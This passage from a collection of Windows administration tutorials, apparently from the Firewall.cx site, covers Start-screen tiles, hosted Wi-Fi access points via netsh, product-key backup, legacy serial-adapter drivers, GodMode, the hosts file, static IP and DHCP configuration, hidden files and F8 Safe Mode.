You can add members to group just as you add groups to members. Just right-click the group in Active Directory Users and Computers node in the Active Directory Users and Computers snap-in, select Properties, click Members tab from the Properties window of the group and then follow the steps from 11-13 from Creating Local User Accounts section.

Article Summary

Dealing with User & Group accounts in a Windows Server environment is a very important everyday task for any Administrator. This article covered basic administration of user and group accounts at both local and domain environments.

  • Hits: 96832

How to Add and Remove Applications from Windows 8 / 8.1 Start Screen

In this article, we'll show you how to add (pin) and remove (unpin) any application from the Windows 8 or Windows 8.1 Metro Start Screen. Tiles or the small squares and rectangles appearing on the Windows 8 Metro Start Screen, represent different programs that you can access by either tapping or clicking on them. The Windows Metro Start screen contains its default tiles, however users have the ability to add or remove  tiles (application shortcuts) to meet their requirements. Adding tiles to the Metro Start screen is called pinning while removing them from the Metro Start screenis called unpinning.

Pinning Apps & Programs To The Windows 8 Metro Start Screen

To pin a Windows application or a Metro App to the Start screen, you have to find it first. For this, tap/click on the Search icon and type the name of the application or the program that you wish to add.

For example, type “Paint” to search for the Windows Paint application as shown below. Once found tap/click on the Apps option:

windows-8-add-remove-application-from-start-screen-01
Figure 1. Searching for Application

Search will come up with the search result for the Paint program, as indicated on the left of the screen. Right-click on the search result or hold your finger on it until a check mark appears besides it and a panel opens up at the bottom of the screen:

windows-8-add-remove-application-from-start-screen-02
Figure 2. Pinning the Application on Windows 8

The Panel offers two options for pinning – Pin to taskbar and Pin to Start. If you like to see the icon of the application on the taskbar on your Windows Desktop, you can tap/click on Pin to taskbar. We want to pin it to the Metro Start screen so Tap/click on the icon Pin to Start, for this article.

The bottom panel now disappears and you can open the application from the icon on the screen. Instead if you would like to go back to the Start screen, click on the bottom left hand corner or swipe in from the right edge of the screen. Now, tap/click on the Start icon. Verify that the application icon has appeared on the Metro Start screen:

windows-8-add-remove-application-from-start-screen-03 
Figure 3. Pinned Application on Windows Metro Start Screen

Unpinning Apps & Programs From The Windows 8 Metro Start Screen

To unpin an application from the Windows Metro Start screen, right-click on its tile or hold your finger on it until a check mark appears besides it and a panel opens up at the bottom of the screen:

windows-8-add-remove-application-from-start-screen-04
Figure 4. Unpin an Application from Windows Metro Start Screen

Tap/click on Unpin from Start and the icon of the selected program will vanish from the screen along with the panel.

Alternate Way To Pin Or Unpin Apps & Programs On The Windows 8 Metro Start Screen

There is another way by which you can pin/unpin most programs on the Windows 8 Metro Start screen.

Windows may not be able to find every program when you search for it. However, Windows 8 provides a very easy method for looking at all the programs available in your system in one screen. Then you can decide all those you want to pin as tiles on the Metro Start screen.

On the Metro Start screen, tap/right-click on any empty space (not covered by any tile) - a bar will appear at the bottom of the screen. Tap/click on the only icon in the bar: All apps. A new Apps screen will open up showing icons of all the apps and programs available in your computer, neatly divided into groups.

windows-8-add-remove-application-from-start-screen-05 
Figure 5. All Apps Windows 8/8.1 Screen

Right-click on any icon or hold your finger on it until a check mark appears besides it and a panel opens up at the bottom of the screen, as in Figure 2.

Now you can choose to pin the app to the Start screen or the Task Bar. Moreover, if the app is already pinned, the panel will allow you to unpin it. Continue doing this to all the apps you want on the Start screen.
Once you are done, tap/click on the All apps icon and you will be back in the Metro Start screen along with all the application tiles you had selected.

Conclusively in this article we learned how to add (pin) or remove (unpin) Tiles or all the small squares and rectangles appearing on the Windows 8 Metro Start Screen to suit our requirements. More articles on Windows 8 & Windows 8.1 can be found in our Windows Workstation section.

  • Hits: 13934

Configure Windows 8 & 8.1 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows 8 into an Access Point

windows-8-secure-access-point-1-preWindows 8 and Windows 8.1 (including Professional edition) operating systems provide the ability to turn your workstation or laptop into a secure wireless access point, allowing wireless clients (including mobile devices) to connect to the local network or Internet. This feature can save you time, money and frustration when there is need to connect wireless devices to the network or Internet but there is no access point available.

In addition, using the method described below, you can turn your Windows system into a portable 3G router by connecting your workstation to your 3G provider (using your USB HSUPA/GPRS stick).

Windows 7 users can visit our article Configuring Windows 7 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows into an Access Point

To begin, open your Network Connections window by pressing Windows Key + R combination to bring up the Run window, and type ncpa.cpl and click OK:

windows-8-secure-access-point-1
Figure 1. Run Command – Network Connections

 The Network Connection window will appear, displaying all network adapters the system current has installed:

windows-8-secure-access-point-2
Figure 2. Network Connections

Let’s now create our new wireless virtual adapter that will be used as an access point for our wireless clients. To do this, open an elevated Command prompt (cmd) by right-clicking on the Window 8 start button located on the lower left corner of the desktop and select Command Prompt (Admin). If prompted by the User Account Control protection, simply click on Yes to proceed:

windows-8-secure-access-point-3
Figure 3. Opening an elevated Command Prompt

Once the command prompt is open, enter the following command to create the wireless network (SSID). The encryption used by default is WPA2-PSK/AES:

C:\windows\system32> netsh wlan set hostednetwork mode=allow ssid=Firewall.cx key=$connect$here

When the command is entered, the system will return the following information:

The hosted network mode has been set to allow.
The SSID of the hosted network has been successfully changed.
The user key passphrase of the hosted network has been successfully changed.
In our example, the Wi-Fi (SSID) is named Firewall.cx and has a password of $connect$here.
 
The system information above confirms the creation of the wireless network and creates our virtual adapter which will be visible in the Network Connection window after the virtual adapter is enabled with the following command:

C:\windows\system32> netsh wlan start hostednetwork

Again, the system will confirm the wireless network has started with the below message:

The hosted network started.

Looking at the Network Connection window we’ll find our new adapter labeled as Local Area Connection 4. Right under the adapter is the SSID name of the wireless network created by the previous command:

windows-8-secure-access-point-4
Figure 4. Network Connections – Our new adapter appears

At this point, our new wireless network (Firewall.cx) should be visible to all nearby wireless clients.

Next, we need to enable Internet sharing on the network adapter that has Internet access. In our case this is the Ethernet adapter. Users accessing the Internet via their mobile broadband adapter should select their broadband adapter instead.

To enable Internet sharing, right-click on the Ethernet network adapter and select properties from the context menu, as shown below:

windows-8-secure-access-point-5Figure 5. Network Connections – Ethernet Adapter Properties

Once the Ethernet adapter properties window appears, select the Sharing tab and tick the Allow other network users to connect through this computer’s Internet connection then select the newly created virtual adapter labelled Local Area Connection 4:

windows-8-secure-access-point-6Figure 6. Enabling sharing and selecting the newly created virtual adapter

Be sure to untick the second option below (not clearly visible in above screenshot): Allow other network users to control or disable the shared Internet connection, then click on OK.

Notice our Ethernet adapter now has the word Shared in its description field:

windows-8-secure-access-point-7
Figure 7. Our Ethernet adapter now appears to be shared

At this point, clients that have successfully connected to our wireless SSID Firewall.cx should have Internet access.

Note that in some cases, it might be required to perform a quick restart of the operating system before wireless clients have Internet access. Remember that in case of a system restart, it is necessary to enter all command prompt commands again.

The command below will help verify the wireless clients connected to our Windows 8 access point:

C:\windows\system32> netsh wlan show hostednetwork
windows-8-secure-access-point-8
Figure 8. Information on our Windows 8 access point

As shown above, we have one wireless client connected to our Windows 8 access point. Windows 8 will support up to 100 wireless clients, even though that number is extremely likely to ever be reached.

This article showed how to turn your Windows 8 & Windows 8.1 operating system into a wireless access point, allowing wireless clients to connect to the Internet or Local LAN.

  • Hits: 22985

Revealing & Backing Up Your Windows 8 – Windows 8.1 Pro License Product Key

windows-8-backup-license-product-key-1aBacking up your Windows License Product Key is essential for reinstallation of your Windows 8 or Windows 8.1 operating system. In some cases, the Genuine Microsoft Label or Certificate Of Authenticity (COA) containing the product key, is placed in an area not easily accessible by users e.g inside the battery compartment in newer ultrabooks/laptops, making it difficult to note the product key.

In this article, we’ll show you how to easily download and store your Windows License Product Key inside a text file with just two clicks!

The information displayed under the System Information page in Windows 8 and Windows 8.1 (including professional editions), includes the Windows edition, system hardware (CPU, RAM), Computer name and Windows activation status. The Windows activation status section shows us if the product is activated or not, along with the Product ID:

windows-8-backup-license-product-key-1

Figure 1. System Information does not show the Product Key

Product Keys and Product IDs are two completely different things, despite the similarity of the terms.

The 20 character Product *ID* is created during the installation process and is used to obtain/qualify for technical support from Microsoft and is of no use during the installation process.

To reveal your Product Key, which is the 20 character ID used during the installation process, simply download and execute the script provided on the second page of our Administrative Utilities Download section.

Once you have downloaded and unzipped the file, double-click on the Windows Key.vbs file to execute the script. Once executed, a popup window will display your Product Name, Product ID and hidden Product Key:

windows-8-backup-license-product-key-2Figure 2. Running the script reveals our Product Key

At this point, you can save the displayed information by clicking on the ‘Yes’ button. This will create a text file with the name “Windows Product Key.txt” and save it in the same location from where the script was executed:

windows-8-backup-license-product-key-3Figure 3. Saving your Windows information to a text file

We should note that every time the script is executed and we select to save the information, it will overwrite the contents of the previous text file. This is important in case you decide to update your Windows with a new product key e.g moving from Windows 8.1 to Windows 8.1 Professional. In this case it would be advisable to rename the previously produced text file before executing the script and saving its information.

This article showed how to reveal and save the Windows Product Key information of your Windows 8 and Windows 8.1 operating system. We also explained the difference between the 20 Digit Product ID, shown in the System Information window, and Product Key.

  • Hits: 25654

Installing The ‘Unsupported’ Profilic USB-to-Serial Adapter PL-2303HXA & PL-2303X on Windows 8 & 8.1

profilic-pl2303-driver-installation-windows8-1aThanks to the absence of dedicated serial ports on today’s laptops and ultrabooks, USB-to-Serial adapters are very popular amongst Cisco engineers as they are used to perform the initial configuration of a variety of Cisco equipment such as routers, catalyst switches, wireless controllers (WLC), access points and more, via their Console Port. The most common USB-to-Serial adapters in the market are based on Profilic’s PL2303 chipset.

With the arrival of Windows 8, Windows 8.1 and upcoming Windows 10, Profilic has announced that these operating systems will not support USB-to-Serial adapters using the PL-2303HXA & PL-2303X chipsets, forcing thousands of user to buy USB-to-Serial adapters powered by the newer PL-2303HXD (HX Rev D) or PL2303TA chipset.

The truth is that PL-2303HXA & PL-2303X chipsets are fully supported under Windows 8 and Windows 8.1 and we’ll show you how to make use of that old USB-to-Serial adapter that might also hold some special sentimental value.

Make sure to download our Profilic Windows 8/8.1 x64bit Drivers from our Administrative Tools section

We took our old USB-to-Serial adapter and plugged it in our ultrabook running Windows 8.1. As expected, the operating system listed the hardware under Device Manager with an exclamation mark:

profilic-pl2303-driver-installation-windows8-1Figure 1. Prolific Adapter in Device Manager

A closer look at the properties of the USB-to-Serial adapter reveals the popular Code 10 error which means that the device fails to start:

profilic-pl2303-driver-installation-windows8-2Figure 2. Prolific Adapter Error Code 10

Getting That Good-old USB-to-Serial Adapter To Work

Assuming you’ve successfully downloaded and unzipped the Profilic Windows 8/8.1 x64bit drivers from our Administrative Tools section, go back to the Device Manager and right click on the Prolific USB-to-Serial Comm Port with the exclamation mark and select Update Driver Software:

profilic-pl2303-driver-installation-windows8-3Figure 3. Updating the Drivers from Device Manager

Next, select Browse my computer for driver software from the next window:

profilic-pl2303-driver-installation-windows8-4Figure 4. Select Browse my computer for driver software

Next, browse to the folder where you’ve unzipped the provided drivers, click on the Include Subfolders option and select Let me pick from a list of device drivers on my computer:

profilic-pl2303-driver-installation-windows8-5Figure 5. Select Let me pick from a list of device drivers on my computer

Next, select the driver version 3.3.2.102 dated 24/09/2008 as shown below and click Next:

profilic-pl2303-driver-installation-windows8-6Figure 6. Install Driver version 3.3.2.102

Once complete, Windows will confirm the successful installation of our driver as shown below:

profilic-pl2303-driver-installation-windows8-7Figure 7. Driver successfully installed

Closing the window, we return back to the Device Manager where we’ll notice the exclamation mark has now disappeared and our old ‘Unsupported’ USB-to-Serial adapter is fully operational:

profilic-pl2303-driver-installation-windows8-8Figure 8. Fully operational USB-to-Serial adapter

This article showed how successfully install your old USB-to-Serial adapter based on the Profilic PL-2303HXA & PL-2303X chipsets on Windows 8 and Windows 8.1 operating systems. Despite the fact Profilic clearly states that these chipset are not supported with the latest Windows, forcing users to purchase new adapters powered by their new chipsets, we’ve proven that this is not true and showed how to make the old Profilic USB-to-Serial adapter work with the drivers available on Firewall.cx.

 

 



  • Hits: 77370

How to Enable Master Control Panel or Enable God Mode in Windows 7, 8 & 8.1

Around 2007, an undocumented feature of Windows, called the God Mode, was published outside of documentation provided by Microsoft. This is the Windows Master Control Panel shortcut. Bloggers named it the All Tasks or the God Mode and it gained popularity as it provided a method of creating a shortcut to various control settings in Windows Vista at the time. Later Windows Operating Systems such as Windows 7, Windows 8 and Windows 8.1 also carry this feature, except the 64-bit version of Windows Vista. It is known that this functionality crashes the Explorer in the 64-bit version of Windows Vista.

Although not intended for use by general users, God Mode or Master Control Panel functionality in Windows is implemented by creating a base folder with a special extension. The format used is:

  <FolderDisplayName>.{<GUID>}

Here, GUID represents a valid Class ID or CLSID that has a System.ApplicationName entry in the Windows Registry. Microsoft documents this technique as “Using File System Folders as Junction Points.FolderDisplayName can be anything - when this technique was discovered, the name GodMode coined by bloggers stuck. Among the many GUID shortcuts revealed in Windows, the CLSID {ed7ba470-8e54-465e-825c-99712043e01c} is of special interest as the related widget points to and permits access to several Windows settings or Control Panel applets.

Users can now create a control panel called GodMode that allows them easy access to almost all the administrative tasks in Windows. In fact, GodMode is so named as users have complete access to all aspects of the management of Windows at their fingertips and in one location. That makes it very convenient to configure the hardware or windows settings quickly from a single screen. You access GodMode by creating a special folder on the desktop.

Arrive at the Windows desktop by closing all the open windows. Right-click on an empty part of the desktop or hold your finger there. In the menu that comes up, tap/click on New and then on the Folder option:

windows-enable-master-control-panel-god-mode-1 Figure 1. Creating a New Folder

You will see a new folder appear on the desktop and the title of the folder will be in edit mode. Modify the title of the new folder, or rename it to:

 GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

Once renames, the icon will change as shown below:

windows-enable-master-control-panel-god-mode-2Figure 2. Create a new folder & rename it to reveal GodMode

 You must double-click/tap on the icon to open the GodMode Screen:

windows-enable-master-control-panel-god-mode-3Figure 3. The GodMode Screen

You can now proceed to tweak Windows using the list of available configuration options presented simply by scrolling through and tapping/clicking the option you want.

If you no longer need to have GodMode in your system, you can safely  delete the GodMode folder on your desktop. 

This article showed how to enable GodMode on Windows Vista (32Bit only), and both 32/64 Bit versions of Windows 7, Windows 8 and Windows 8.1.

  • Hits: 19619

The Importance of Windows Hosts File - How to Use Your Hosts File on Windows Workstations and Windows Servers

This article explains how the Windows operating system makes use of the popular Host file, where it is located for various operating systems, how it can be used to manipulate DNS lookups and redirect DNS lookups to different IP addresses and hosts.

What Is The Domain Name System?

The Internet uses a standard domain name resolution service called the DNS or the Domain Name System. All devices on the Internet have a unique IP address, much like the postal addresses people use. On the Internet, any device wanting to connect to another can do so only by using the IP address of the remote device. To know the remote IP address, the device has first to resolve the remote domain name to its mapped IP address by using DNS.

The device queries the DNS server, usually configured by the local router, by requesting the server for the IP address of that specific remote domain name. In turn, the DNS server may have to query other similar servers on the Internet until it is able to locate the correct information for that domain name. The DNS server then returns the remote IP address to the device. Finally, the device opens a connection directly to the remote IP address to perform the necessary operations.

An Alternative Method – The 'Hosts' File

Querying the DNS server to connect to a remote device can be a time-consuming process. An alternative faster method is to look up the hosts file first. This is like the local address book in your mobile, which you can consult for quickly calling up commonly used telephone numbers. All operating systems use a hosts file to communicate via TCP/IP, which is the standard of communication on the Internet. In the hosts file, you can create a mapping between domain names and their corresponding IP addresses.

You can view the contents of the hosts file in a text editor. Typically, it contains IP addresses and corresponding domain names separated by at least one space, and each entry on its own line. By suitably manipulating the contents of the hosts file, it is very easy to interchange the IP address mappings of Google.com and Yahoo.com, such that when searching for Yahoo your browser will point to Google and vice versa!

Most operating systems, including Microsoft Windows, are configured to give preference to the hosts file over the DNS server queries. In fact, if your operating system finds a mapping for a domain name in its hosts file, it will use that IP address directly and not even bother to query the DNS server. Whatever entries you add to your hosts file, they start working immediately and automatically. You will not need to either reboot or enter any additional command to make the operating system start using the entries in the hosts file.

Understanding Domain Name Resolution On Windows

Windows machines may not always have a hosts file, but they will have a sample hosts file named as lmhosts.sam. You will find the hosts file and lmhosts.sam file in the following location for all Windows opertating systems, including Server editions:

c:\ Windows\System32\drivers\etc\hosts

windows-hosts-file-usage-and-importance-1Figure 1. Hosts & lmhosts.sam files in File Explorer

In case the hosts file is missing, you can copy the lmhosts file to hosts and use it as you wish after editing it in Notepad.

Getting The Most Out Of Your Hosts File

The Windows hosts file is a great help in testing new machines or deployment servers. You may want to set up and test online servers, but have them resolving only for your workstation. For example, your true web server may have a domain name www.firewall.cx, while you may have named your development server development.firewall.cx.

To connect to the development server from a remote location, you could change www.firewall.cx in your public DNS server to point to development.firewall.cx, or add an additional entry in the public DNS server. The problem with this method is that although you would be able to log into your development server, so would everyone else as the DNS server is publicly accessible.

So, instead of adding or changing resource records on your public DNS server, you can modify the hosts file on the computer that you will be using for connecting to the remote development server. Simply add an entry in the hosts file to map development.firewall.cx or even www.firewall.cx to the IP address of your development server. This will let your test bed computer connect to your development server without making the server publicialy discoverable via DNS.

Another great usage of the hosts file is to block Spyware and/or Ad Networks. Add all the Spyware sites & Ad Networks domain names in the Windows hosts file and map them to the IP address 127.0.0.1, which will always point back to your machine. That means your browser will be unable to reach these sites or domains. This has a dual benefit.

You can download ready-made hosts files that list large numbers of known ad servers, banner sites, sites giving tracking cookies, sites with web bugs and infected sites. You can find such hosts files on the Hosts File Project. Before using one of these files in your computer, it would be advisable to backup the original file first. Although using the downloadable hosts files is highly recommended, one must keep in mind that large hosts files may slow down your system.

Usually, Windows uses a DNS Client for caching previous DNS requests in memory. Although this is supposed to speed up the process, having simultaneously to read the entire hosts file into the cache may cause the computer to slow down. You can easily fix this by turning off and disabling the unnecessary DNS Client from the Services control panel under the Administrative Tools.

Conclusion

The Windows hosts file can be found on all Window operating systems, including server editions. If used with care, the Windows hosts file can be a powerful tool. It can make your computer environment much safer by helping to block malicious websites and at the same time potentially increasing your browser speed.

 

  • Hits: 20283

How To Change & Configure An IP Address or Set to DHCP, Using The Command Prompt In Windows 7

Not many users are aware that Windows 7 provides more than one way to configure a workstation’s network adaptor IP address or force it to obtain an IP address from a DHCP server. While the most popular method is configuring the properties of your network adaptor via the Network and Sharing Center, the less popular and unknown way for most users is using the netsh Command Prompt. In this tutorial, we show you how to use the Command Prompt netsh command to quickly and easily configure your IP address or set it to DHCP.  Competent users can also create simple batch files (.bat) for each network (e.g home, work etc) so they can execute them to quickly make the IP address, Gateway IP and DNS changes.

In order to successfully change the IP address via Command Prompt, Windows 7 requires the user to have administrative rights. This means even if you are not the administrator, you must know the administrative password, since you will be required to use the administrative command prompt.

Opening The Administrative Command Prompt On Windows 7

To open the administrative command prompt in Windows 7, first click on the Start icon. In the search dialog box that appears, type cmd and right-click on the cmd search result displayed. On the menu that Windows brings up, click on the Run as administrator option as shown in the below screenshot:

windows-7-change-ip-address-via-cmd-prompt-1Figure 1. Running CMD as Administrator

Depending on your User Account Control Settings (UAC), Windows may ask for confirmation. If this happens, simply click on Yes and Windows will present the CLI prompt running in elevated administrator privileged mode:

windows-7-change-ip-address-via-cmd-prompt-2Figure 2.  The Administrative Command Prompt Windows 7

Using The ‘netsh’ Command Prompt To Change The IP Address, Gateway IP & DNS

At the Administrative Command Prompt, type netsh interface ip show config, which will display the network adapters available on your system and their names. Note down the name of the network adaptor for which you would like to set the static IP address.

windows-7-change-ip-address-via-cmd-prompt-3Figure 3.  Finding Our Network Adapter ID

In our example, we’ll be modifying the IP address of the interface named Wireless Network Connection, which is our laptop’s wireless network card.

Even if the Wireless Network Connection is set to be configured via DHCP, we can still configure a static IP address. Following is the command used to configure the interface with the IP address of 192.168.5.50 with a subnet mask of 255.255.255.0 and finally a Gateway of 192.168.5.1:

C:\Windows\system32> netsh interface ip set address "Wireless Network Connection" static 192.168.5.50 255.255.255.0 192.168.5.1

Next, we configure our primary DNS server using the netsh command with the following parameters:

C:\Windows\system32> netsh interface ip set dnsserver "Wireless Network Connection" static 8.8.8.8

Note: When entering a DNS server, Windows will try to query the DNS server to validate it. If for any reason the DNS server is not reachable (therefore not validated), you might see the following error:

The configured DNS server is incorrect or does not exist

To configure the DNS server without requiring DNS Validation, use the validate=no parameter at the end of the command:

C:\Windows\system32> netsh interface ip set dnsserver "Wireless Network Connection" static 8.8.8.8 validate=no

This command forces the DNS server setting without any validation and therefor no error will be presented at the CLI output in case the DNS server is not reachable.

To verify our new settings, use the netsh command with the following parameters:

C:\Windows\system32> netsh interface ip show config

At this point, we should see the network settings we configured, as shown below:

windows-7-change-ip-address-via-cmd-prompt-4Figure 4. Verifying Our New Network Settings

Using The 'netsh' Command Prompt To Set The Network Interface Card To DHCP

You can use the netsh command to switch your current adapter from static to DHCP.  To switch your network adaptor from static IP configuration to DHCP, use the following command:

C:\Windows\system32> netsh interface ip set address "Wireless Network Connection” dhcp

Windows will not return any confirmation after the command is entered, however if the network adaptor has successfully obtained an IP address and has Internet connection, there should not be any network icon with an exclamation mark in the taskbar notification area as shown below:

windows-7-change-ip-address-via-cmd-prompt-5Figure 5.  Wireless Icon with no Exclamation Mark

Finally, to verify that DHCP is enabled and we’ve obtain an IP address, use the netsh command with the following parameters:

C:\Windows\system32> netsh interface ip show config

This article showed how to configure a Windows 7 network interface with an IP address, Gateway and DNS server, using the Administrative Command Prompt. We also showed how to set a Windows 7 network interface to obtain an IP address automatically from a DHCP server.



  • Hits: 180963

How to View Hidden Files and Folders In Windows 8 & 8.1

windows-8-how-to-show-hidden-folders-files-1aWindows 8 & 8.1 hides two types of files so that normally, you do not see them while exploring your computer. The first type is the files or folders with their 'H' attribute set to make them hidden. The other type is Windows System files. The reason behind hiding these files is that users could inadvertently tamper with them or even delete those causing the operations of Windows 8/8.1 to fail. This article explains how you can configure Windows 8 or 8.1 to show all hidden files and folders, plus show Windows system files.

You can change the behavior of your Windows 8/8.1 computer to show hidden files by changing the settings in the Folder Options screen. There are two primary ways you can reach the Folder Options screen. Both are analysed below:

Windows 7 users can also refer to our How to View Hidden Files and Folders In Windows 7 article

Method 1: Making Hidden & System Files Visible From Windows Explorer

Begin from the Start Screen by closing down all open applications.

Step 1: Tap/click on the Desktop tile to bring up the Windows Desktop.

Step 2: Tap/click on the Files Explorer icon in the Panel at the bottom left hand side of your Desktop:

windows-8-how-to-show-hidden-folders-files-1Figure 1. Icons in the Windows Panel

When the Explorer window opens, expand the Ribbon by pressing the keys Ctrl+F1 together, or by tapping/clicking on the Down-Arrow at the top right hand corner of the window panel. Next, tap/click on the View tab and then on the Local Disk (C:) option. Tap/click on Large Icons option in the ribbon to see the folders.

Within the ribbon, if you tap/click to place a check mark in the checkbox against the Hidden items options, all hidden folders and files will become visible and will show up with semi-transparent icons:

windows-8-how-to-show-hidden-folders-files-2Figure 2. File Explorer showing hidden folders and files

Method 2: Making Hidden & System Files Visible From The Folder Options

Starting from any screen, swipe in from the right hand edge or tap/click on the bottom right hand corner of the screen to bring up the Charms:

windows-8-how-to-show-hidden-folders-files-3Figure 3. Windows Charms

Tap/click on the Search icon and type “Control” within the resulting dialog box. Within the search results displayed, you will find Control Paneltap/click on this to bring up the Control Panel:

windows-8-how-to-show-hidden-folders-files-4Figure 4. Control Panel

Tap/click on the Appearance and Personalization link, which will open up the Appearance and Personalization screen.

Next, Tap/click on the Folder Options link or the Show hidden files and folders link to bring up the Folders Option screen:

windows-8-how-to-show-hidden-folders-files-5Figure 5. Control Panel - Folder Options

Another way to reach the Folder Options is from File Explorer. In the View tab, tap/click on Options (ribbon expanded) to get a link for Change folder and search options. Tap/click on the Change folder and search options link to open up the Folder Options window.

Click on either Folder Options or Show hidden files and folders to reach the Folder Options screen as shown below:

windows-8-how-to-show-hidden-folders-files-6 Figure 6. Folder Options Screen

In the Folder Options screen, click on the View tab, go to the Hidden files and folders option and click on the radio button under it labeled as Show hidden files, folders and drives. This will change all the invisible hidden and system files and folders and make them visible.

It is important to see the file extension to know a file type - normally, Windows keeps this hidden. While still in the Folder Options screen, go to the label Hide extensions for known file types and remove the checkmark against it.

As mentioned in the beginning of our article, Windows hides files belonging to the operating system. To make these visible, click and uncheck the label Hide protected operating system files (Recommended). At this time, Windows will warn you about displaying protected system files and ask you whether you are sure about displaying them – Click on the Yes button.

To make the changes effective, click on the Apply button and subsequently on the OK button. All screens will close and you will be back to your Desktop

The folders with the semi-transparent icons are the hidden folders, while those with fully opaque icons are the regular ones.

If you do not want Windows 8/8.1 to show hidden files and folders, follow the reverse procedure above in the Folder Options screen.

  • Hits: 52956

How to View Hidden Files & Folders in Windows 7

windows-7-showing-hidden-files-1This article shows you how to see hiddeen files and folders in Windows 7. Windows 7 hides important system files so that normally, you do not see them while exploring your computer.

The reason behind hiding these files is that users could inadvertently tamper with them or even delete those causing Windows 7 operations to falter. However, malicious software programs take advantage of this feature to create hidden files or folders and cause disruptions in the computer's operations without the user being able to detect them.

Therefore, being able to see hidden files or folders has its advantages and helps in repairing damages caused by unwanted hidden files. You can change the behavior of your Windows 7 computer to show hidden files by changing the settings in the Folder Options screen. There are two primary ways you can reach the Folder Options screen. Start by closing down all open applications.

Windows 8 and 8.1 users can also refer to our How to View Hidden Files and Folders In Windows 8 & 8.1 article

Method 1: Reaching The Folder Options Screen From Windows Explorer

Click on the Windows Explorer icon in the TaskBar at the bottom left hand side of your Desktop:

windows-7-showing-hidden-files-2Figure 1. Icons in the Windows Panel

When the Explorer window opens, you have to click on the Organize button to display a drop down menu:

windows-7-showing-hidden-files-3Figure 2. Organize Menu

Next, Click on the Folder and Search options and the Folder Options screen opens up:

windows-7-showing-hidden-files-6Figure 3. Show hidden files, folders and drives & Hide extensions for known file types

In the Folder Options screen, click on the View tab, go to the Hidden files and folders option and click on the radio button under it labeled as Show hidden files, folders and drives. This will change all the invisible files and folders and make them visible.

It is important to note the Hide extension to know a file type option - normally, Windows keeps this hidden. While still in the Folder Options screen, go to the label Hide extensions for known file types and click to remove the checkmark against it as shown in the above screenshot. This will force Windows to show all extension types for all files.

When ready, click on the Apply and OK button to save the changes.

Method 2: Reaching The Folder Options Screen From The Control Panel

Click on the Start icon in the Panel at the bottom left hand side of your Desktop – see figure 4 below. In the resulting Start menu, you must click on the Control Panel option.

windows-7-showing-hidden-files-4Figure 4. Start Menu

This opens up the Control Panel screen, which allows you to control your computer's settings. Click on the Appearance and Personalization link to open up the Appearance and Personalization screen.

windows-7-showing-hidden-files-5Figure 5. Appearance and Personalization screen

Click on either Folder Options or Show hidden files and folders on the left window, to reach the Folder Options screen.

There are other ways as well to reach the Folder Options screen.

windows-7-showing-hidden-files-6Figure 6. Show hidden files, folders and drives & Hide extensions for known file types

In the Folder Options screen, click on the View tab, go to the Hidden files and folders option and click on the radio button under it labeled as Show hidden files, folders and drives. This will change all the invisible files and folders and make them visible.

It is important to note the Hide extension to know a file type option - normally, Windows keeps this hidden. While still in the Folder Options screen, go to the label Hide extensions for known file types and click to remove the checkmark against it as shown in the above screenshot. This will force Windows to show all extension types for all files.

Windows also hides files belonging to the operating system. To make these visible, click and uncheck the label Hide protected operating system files (Recommended). At this time, Windows will warn you about displaying protected system files and ask you whether you are sure about displaying them – Click on the Yes button.

When ready, click on the Apply and OK button to save the changes.

Windows Now Shows Hidden Files & Folders

When we next browse through C: Drive, we'll notice that there are now additional folders and files which were previously hidden:

windows-7-showing-hidden-files-7Figure 7. C: Drive showing hidden folders

The folders with the semi-transparent icons are the hidden folders, while those with fully opaque icons are the regular ones.

If you do not want Windows 7 to show hidden files and folders, follow the reverse procedure executed in the Folder Options screen.

  • Hits: 65436

How to Start Windows 8 and 8.1 in Safe Mode – Enabling F8 Safe Mode

This article will show you how to start Windows 8 and Windows 8.1 in Safe Mode and how to enable F8 Safe Mode. Previous Windows O/S users would recall that by pressing and holding the F8 key while Windows is booting (before the Windows logo appears), the system will prompt the user a special menu allowing the user to direct the Operating System to enter the Safe Mode.

When Windows boots, the Safe Mode logo appears on all four corners of the screen:

windows-8-enable-f8-safe-mode-1Figure 1. Windows 8/8.1 in Safe Mode

Occasionally, Windows will not allow you to delete a file or uninstall a program. This may be due to several reasons one of which can be a virus, a malware infection or some driver/application compatibility. Windows may also face hardware driver problems that you are unable to diagnose in the normal process. Traditionally, Windows provides a Safe Mode to handle such situations. When in Safe Mode, only the most basic drivers and programs that allow Windows to start are loaded.

Unlike all other Windows operating systems, Windows 8 and 8.1 do not allow entering Safe Mode via F8 key by default. If you are unable to boot into Windows 8 or 8.1 after several attempts, the operating system automatically loads the Advanced Startup Options that allow you to access Safe Mode.

For users who need to force their system to boot into Safe Mode, there are two methods to enter the Advanced Startup Settings that will allow Windows to boot into Safe Mode.

Method 1 - Accessing Safe Mode In Windows 8 / Windows 8.1

Accessing Safe Mode involves a number of steps and actions required by the user. These are covered in great depth in our How to Enable & Use Windows 8 Startup Settings Boot Menu article.

Method 2 - Enabling Windows Safe Mode Using F8 Key At Boot Time

If you find accessing Windows 8 Safe Mode too long and complex, you can alternatively enable the F8 key for booting into Safe Mode, just as it happens with the older Windows operating systems. This of course comes at the expense of slower booting since the operating system won't boot directly into normal mode.

Interestingly enough, users who choose to enable F8, can also access the diagnostic tools within the Safe Mode quickly at any time. Additionally, if you have multiple operating systems on your computer, enabling the F8 option makes it easier to select the required operating system when you start your computer.

Enabling the F8 key in Windows 8/8.1 is only possible with administrative permissions. For this, you will need to open an elevated command prompt. The easiest way to open the elevated command prompt window is by using the Windows and X key combination on your keyboard:

windows-8-enable-f8-safe-mode-2Figure 2. Windows Key +X

The Windows Key + X combination opens up the Power User Tasks Menu from which you can tap/click the Command Prompt (Admin) option:

windows-8-enable-f8-safe-mode-3Figure 3. Power User Tasks Menu

Should you will receive a prompt from the User Account Control (UAC) requesting confirmation, simply allow the action and the command prompt should appear.

At the command prompt type in the following command and then press the Enter key:

C:\Windows\System32> bcdedit /set {default} bootmenupolicy legacy

windows-8-enable-f8-safe-mode-4 Figure 4. Administrative Command Prompt - Enable F8 Boot Function

On successful execution, Windows will acknowledge - The operation completed successfully.

Now, to enable the changes to take effect, you must reboot Windows. If you press the F8 key during Windows boot, you should be able to access Safe Mode and all other Advanced Boot Options.

If for any reason, you want to disable the F8 option, open the Administrative Command Prompt, enter the following command and then press the Enter key:

C:\Windows\System32> bcdedit /set {default} bootmenupolicy standard

 windows-8-enable-f8-safe-mode-5Figure 5. Administrative Command Prompt - Disable F8 Boot Function

